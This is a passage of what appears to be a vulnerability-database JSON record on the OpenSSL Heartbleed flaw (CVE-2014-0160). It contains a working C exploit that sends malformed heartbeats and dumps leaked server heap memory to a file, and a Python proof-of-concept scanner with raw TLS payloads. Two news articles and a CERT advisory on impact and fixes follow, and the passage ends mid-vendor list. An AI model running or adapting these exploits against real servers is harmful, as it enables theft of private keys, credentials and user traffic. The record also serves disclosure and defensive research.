read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat payload_length\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tret = tcp_connect(host, port);\n\t\tpre_cmd(ret, precmd, verbose);\n\t\tc = tls_connect(ret);\n\t\theartbleed(c,type);\n\t\twhile(repeat==1){\n\t\t\tsneakyleaky(c,file,verbose);\n\t\t}\n\t\twhile(loop==1){\n\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\tfirst=0;\n\t\t\trepeat=1;\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t}\n\t\tprintf(\"[ done.\\n\");\n\t\texit(0);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tret = tcp_bind(host, port);\n\t\twhile(1){\n \t\t\tsd=accept(ret,0,0);\n\t\t\tif(sd==-1){\n\t\t\t\tprintf(\"[!] FATAL: problem with accept()\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t\tif(pid=fork()){\n\t\t\t\tclose(sd);\n\t\t\t}\n \t\t\telse{\n\t\t\t\tc = tls_bind(sd);\n\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t\twhile(loop==1){\n\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\tfirst=0;\n\t\t\t\t\trepeat=0;\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 1, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : [2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() + timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The Tor Project has begun blacklisting exit nodes vulnerable to the [Heartbleed vulnerability in OpenSSL](<https://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>).\n\nResearcher Collin Mulliner, with the Systems Security Lab at Northeastern University in Boston, published the results of an experiment he conducted using a publicly disclosed Heartbleed proof-of-concept exploit against 5,000 Tor nodes. Mulliner said that [1,045 nodes, or a little more than 20 percent, were vulnerable to the bug](<http://www.mulliner.org/blog/blosxom.cgi/security/torbleed.html>).\n\nMulliner said only Tor exit nodes were leaking plaintext user traffic, including host names, credentials and web content. Mulliner conducted his experiment for three days last Friday through Sunday, and his results are a point-in-time snapshot. A post yesterday from Tor Project leader Roger Dingledine on the Tor mailing list said that [380 vulnerable exit keys were being rejected](<https://lists.torproject.org/pipermail/tor-relays/2014-April/004336.html>).\n\nHeartbleed was publicly reported on April 7. The vulnerability lies in the heartbeat function in OpenSSL 1.0.1 to 1.0.1f [which publicly leaks 64 KB of memory](<https://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309>) to any client or server pinging a web server running the vulnerable crypto library. The memory leaks can disclose in plaintext anything from user credentials to private server keys if the attack is repeated enough. Several researchers have already managed to [retrieve private SSL keys](<http://threatpost.com/stealing-private-ssl-keys-using-heartbleed-difficult-not-impossible/105413>) in an online challenge from vendor CloudFlare. Speculation is that intelligence agencies and/or hackers may have been exploiting it since November. Mulliner said he did not try to extract private keys from Tor, nor did he think it was possible.\n\nTor promises anonymity to its users by using proxies to pass encrypted traffic from source to destination. Mulliner said he used a random list of 5,000 Tor nodes from the Dan.me.uk website for his research; of the 1,045 vulnerable nodes he discovered, he recovered plaintext traffic that included Tor plaintext announcements, but a significant number of nodes leaked user traffic in the clear.\u201d\n\n\u201cI found a significant amount of plaintext user traffic, complete Web traffic, session IDs; everything you would find if you ran Heartbleed against a normal Web server,\u201d Mulliner said.\n\nHeartbleed saves attackers the work of setting up their own exit node and waiting for traffic to pass through it. Using Heartbleed, all a hacker would have to do is query a vulnerable exit node to obtain traffic, Mulliner said.\n\nDingledine yesterday published the first list of rejected exit nodes and said those nodes will not be allowed back on the network.\n\n\u201cI thought for a while about trying to keep my list of fingerprints up-to-date (i.e. removing the !reject line once they\u2019ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don\u2019t want this identity key on the Tor network even after they\u2019ve upgraded their OpenSSL,\u201d Dingledine wrote. He added that he hopes others will add to this list as other vulnerable relays are discovered.\n\nTor acknowledged [some of its components were vulnerable to Heartbleed](<https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>) in a post to its blog on April 7.\n\nMulliner said it was a fairly straightforward process to write a script to run a Heartbleed proof of concept.\n\n\u201cAnybody who can get the Python script can play around with it,\u201d Mulliner said, adding that there are likely fewer vulnerable Tor nodes now than when he ran his scans last week since some have likely been patched and Tor has begun blacklisting. \u201cThe data is dated, but it\u2019s a good picture of that point in time.\u201d\n", "modified": "2014-04-22T15:45:23", "published": "2014-04-17T11:40:41", "id": "THREATPOST:15624C23F5CD5AC1029501D08A99D294", "href": "https://threatpost.com/tor-begins-blacklisting-exit-nodes-vulnerable-to-heartbleed/105519/", "type": "threatpost", "title": "Tor Blacklisting Exit Nodes Vulnerable to Heartbleed Bug", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:59:00", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). The release resolves more than 100 security vulnerabilities, many of which received high common vulnerability scoring system base scores and should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all user \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning or March, researchers at the London-based computer security firm Portcullis claimed to uncover[ four bugs in the Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). The update makes no mention of these vulnerabilities either.\n", "modified": "2014-04-21T14:36:06", "published": "2014-04-16T12:32:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:46", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "### Overview \n\nOpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as \"heartbleed.\"\n\n### Description \n\nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2 beta through 1.0.2-beta1 contain a flaw in its implementation of the TLS/DTLS heartbeat functionality ([RFC6520](<https://tools.ietf.org/html/rfc6520>)). This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL libssl library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to increase the chances that a leaked chunk contains the intended secrets. The sensitive information that may be retrieved using this vulnerability include:\n\n * Primary key material (secret keys)\n * Secondary key material (user names and passwords used by vulnerable services)\n * Protected content (sensitive data used by vulnerable services)\n * Collateral (memory addresses and content that can be leveraged to bypass exploit mitigations)\n \nPlease see the [Heartbleed](<http://heartbleed.com/>) website for more details. Exploit code for this vulnerability is publicly available. Any service that supports STARTTLS (imap,smtp,http,pop) may also be affected. \n--- \n \n### Impact \n\nBy attacking a service that uses a vulnerable version of OpenSSL, a remote, unauthenticated attacker may be able to retrieve sensitive information, such as secret keys. By leveraging this information, an attacker may be able to decrypt, spoof, or perform man-in-the-middle attacks on network traffic that would otherwise be protected by OpenSSL. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [OpenSSL 1.0.1g](<http://www.openssl.org/news/secadv_20140407.txt>). Please contact your software vendor to check for availability of updates. Any system that may have exposed this vulnerability should regenerate any sensitive information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items. Old keys should be revoked. \n \nReports indicate that the use of `mod_spdy` can prevent the updated OpenSSL library from being utilized, as mod_spdy uses its own copy of OpenSSL. Please see <https://code.google.com/p/mod-spdy/issues/detail?id=85> for more details. \n \n--- \n \n**Disable OpenSSL heartbeat support** \n \nThis issue can be addressed by recompiling OpenSSL with the `-DOPENSSL_NO_HEARTBEATS` flag. Software that uses OpenSSL, such as Apache or Nginx would need to be restarted for the changes to take effect. \n \n**Use Perfect Forward Secrecy (PFS)** \n \n[PFS](<http://en.wikipedia.org/wiki/Forward_secrecy>) can help minimize the damage in the case of a secret key leak by making it more difficult to decrypt already-captured network traffic. However, if a ticket key is leaked, then any sessions that use that ticket could be compromised. Ticket keys may only be regenerated when a web server is restarted. \n \n--- \n \n### Vendor Information\n\n720951\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Amazon Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/>\n\n### Arch Linux Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugs.archlinux.org/task/39775>\n\n### Aruba Networks, Inc. 